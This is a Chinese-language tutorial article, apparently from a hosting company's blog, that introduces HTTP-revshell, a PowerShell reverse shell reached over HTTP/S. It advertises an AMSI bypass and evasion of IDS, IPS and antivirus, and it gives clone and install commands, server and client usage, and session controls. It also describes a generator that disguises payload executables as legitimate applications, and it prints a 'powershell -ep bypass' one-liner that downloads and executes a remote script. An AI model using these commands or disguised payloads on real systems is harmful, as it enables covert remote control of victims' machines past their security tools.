您好,登錄后才能下訂單哦!
這篇文章將為大家詳細講解有關HTTP-revshell是什么意思,小編覺得挺實用的,因此分享給大家做個參考,希望大家閱讀完這篇文章后可以有所收獲。
HTTP-revshell是一個能夠繞過AMSI的PowerShell代理感知型反向Shell,這款工具轉為紅隊研究人員以及滲透測試人員設計,能夠通過HTTP/S協議來給研究人員提供一個反向Shell鏈接。HTTP-revshell使用了一種隱蔽的數據信道,可以通過Web請求來獲取目標設備的控制權,從而繞過類似IDS、IPS和AV之類的安全解決方案。
SSL
代理感知
上傳功能
下載功能
錯誤控制
AMSI繞過
服務器端多會話支持
PowerShell函數自動補全
廣大研究人員可以使用下列命令將該項目源碼克隆至本地,并完成依賴組件的自動化安裝:
git clone https://github.com/3v4Si0N/HTTP-revshell.git cd HTTP-revshell/ pip3 install -r requirements.txt
upload /src/path/file C:\dest\path\file
download C:\src\path\file /dst/path/file
usage: server.py [-h] [--ssl] [--autocomplete] host port Process some integers. positional arguments: host Listen Host port Listen Port optional arguments: -h, --help show this help message and exit --ssl Send traffic over ssl --autocomplete Autocomplete powershell functions
Import-Module .\Invoke-WebRev.ps1 Invoke-WebRev -ip IP -port PORT [-ssl]
服務器端支持同時與客戶端建立多個鏈接,下面給出的菜單中包含三哥基礎命令,即sessions、interact和exit:
- sessions --> 顯示當前活動會話 - interact --> 與一個會話進行交互,比如說:interact <session_id> - exit --> 關閉應用程序
如需修改會話,可以按下CTRL+D來退出當前會話,此時不會關閉原有會話。
這個腳本可以幫助我們創建一個帶有Payload的可執行文件,這個文件是我們使用HTTP-revshell所必須的。工具提供了六個預定義的模板和一個支持自定義的模板。工具生成的Payload會偽裝成合法應用程序的圖標、產品信息和版權信息等等。除此之外,它們都會在與服務器建立連接之前打開原始的應用程序,并偽裝成合法應用程序來執行。
powershell -ep bypass "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"
關于“HTTP-revshell是什么意思”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,使各位可以學到更多知識,如果覺得文章不錯,請把它分享出去讓更多的人看到。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。